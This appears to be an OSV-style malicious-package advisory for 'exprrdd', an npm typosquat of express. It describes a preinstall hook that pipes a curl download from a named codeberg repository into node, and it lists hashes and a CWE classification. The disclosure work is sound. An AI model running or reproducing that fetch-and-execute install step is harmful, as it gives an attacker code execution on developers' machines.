-= Per source details. Do not edit below this line.=-
Package 'exprrdd' copies express's metadata (name-lookalike, description, author, contributors, repository, keywords, dependencies) as cover for a preinstall dropper. package.json line 98 declares a preinstall script that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js and pipes the response directly into node, executing attacker-controlled JavaScript on the installer's machine at npm install time. The fetched script is unpinned and mutable (a raw branch URL fronted by a web.archive.org rewrite), so whoever controls the codeberg.org/hellscripter repository gains arbitrary code execution on every host that installs this package. The typosquat name maximizes accidental installs by developers mistyping 'express'.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020629",
"import_time": "2026-09-29T14:44:37.259630412Z",
"modified_time": "2026-09-29T14:39:55Z",
"sha256": "bc1c956097cd13e80298a796a5026ebd91ece7c2ad53d226d3729f0b0b0ee9f3",
"source": "amazon-inspector",
"versions": [
"5.2.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "b8db5a768396796ff638ce0e6d6247d9073a87cde72132f9622cad4934a9da0d",
"tlsh": "8551da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e52f71b9fbf"
}
],
"package_integrity": [
{
"filename": "exprrdd-5.2.1.tgz",
"hashes": {
"sha1": "8e492767d36374a96562bd3ddf7679da37d4468e",
"sha512_sri": "sha512-EPTt+ld6E+zZo4gtezupKHXgTKcGRXgpUGRoRguzhQTFiXo7HWU0ESqePWK9R//5Q3b1gJGkcDNDJMEzwD4NAw=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exprrdd/MAL-2026-17244.json"